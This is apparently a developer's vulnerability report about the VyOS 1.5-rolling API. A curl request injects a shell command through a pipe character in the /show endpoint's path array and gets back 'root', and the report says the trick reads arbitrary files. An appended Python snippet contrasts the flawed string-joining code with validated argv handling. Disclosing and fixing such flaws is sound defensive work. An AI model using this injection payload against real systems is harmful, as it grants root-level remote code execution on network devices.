Hi all,
I am a developer recently assigned to use VyOS for a service running on our cloud infrastructure.
While testing the built-in API for external integration, I accidentally noticed that certain API requests could execute operating system commands on the VyOS system. At first, I was unsure whether this behavior was intended or a bug, so I performed additional tests.
Based on the results, I am reporting this behavior to ask for clarification on whether this is an intended feature or a potential security vulnerability.
VyOS version
Version: VyOS 1.5-rolling-202512110917
Release train: current
Release flavor: qcow2
Architecture: x86_64
System type: KVM guest (OpenStack)
Summary
The built-in VyOS API allows authenticated users to inject shell commands via the path parameter when calling the /show endpoint. By appending shell metacharacters (such as |) to elements of the path array, arbitrary operating system commands are executed on the VyOS system with root privileges. This behavior enables authenticated remote code execution (RCE) and does not appear to be documented or intended.
Steps to reproduce
- Enable and expose the built-in VyOS API.
- Send an authenticated request to the /show endpoint.
- Inject a shell command into the last element of the path array using a shell metacharacter.
Example request:
curl -L 'https://<vyos-ip>/show' \
  -F 'data={"op":"show","path":["interfaces","ethernet | whoami"]}' \
  -F 'key="<api-key>"'
Result:
The injected command is executed on the VyOS system and its output is returned in the API response.
Response:
{ "success": true, "data": "root\n", "error": null }
The same behavior can be used to read arbitrary files or execute other system commands.
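As an added illustration of the bug class described above (not VyOS's own code and not from the report): the vulnerable pattern of joining the API's path array into one shell string next to a hardened form that validates each element and builds an argv list so no shell ever parses it. The SAFE_TOKEN pattern and the use of echo as a stand-in for the op-mode command are assumptions made for this example.

```python
import re
import subprocess

# Assumed allow-list for op-mode path tokens (not VyOS's own rule): keywords,
# interface names, addresses and paths, but no shell metacharacters like | ; $ `.
SAFE_TOKEN = re.compile(r"^[A-Za-z0-9_.:/@-]+$")


def vulnerable_show_command(path):
    """Bug pattern: API-supplied elements are concatenated into a single string
    that a shell later parses, so '|' inside an element becomes a pipeline."""
    return "show " + " ".join(path)


def safe_show_argv(path):
    """Hardened form: reject any element outside the allow-list, then return an
    argv list for subprocess.run(argv) without shell=True. A '|' in an element
    would then be passed literally as one argument, never interpreted."""
    if not path or not all(isinstance(p, str) for p in path):
        raise ValueError("path must be a non-empty list of strings")
    for element in path:
        if not SAFE_TOKEN.match(element):
            raise ValueError(f"rejected path element: {element!r}")
    return ["show", *path]


def run_argv_demo(argv):
    """Run the argv list without a shell. 'echo' stands in for the real op-mode
    binary (constructed for this example) so it runs anywhere; returns stdout."""
    completed = subprocess.run(["echo", *argv[1:]], capture_output=True,
                               text=True, check=True)
    return completed.stdout.strip()


if __name__ == "__main__":
    injected = ["interfaces", "ethernet | whoami"]   # the element from the report
    print(vulnerable_show_command(injected))         # 'show interfaces ethernet | whoami'
    try:
        safe_show_argv(injected)
    except ValueError as err:
        print("validation:", err)
    # Without a shell the metacharacter is inert: it is echoed back as text.
    print(run_argv_demo(["show", *injected]))
```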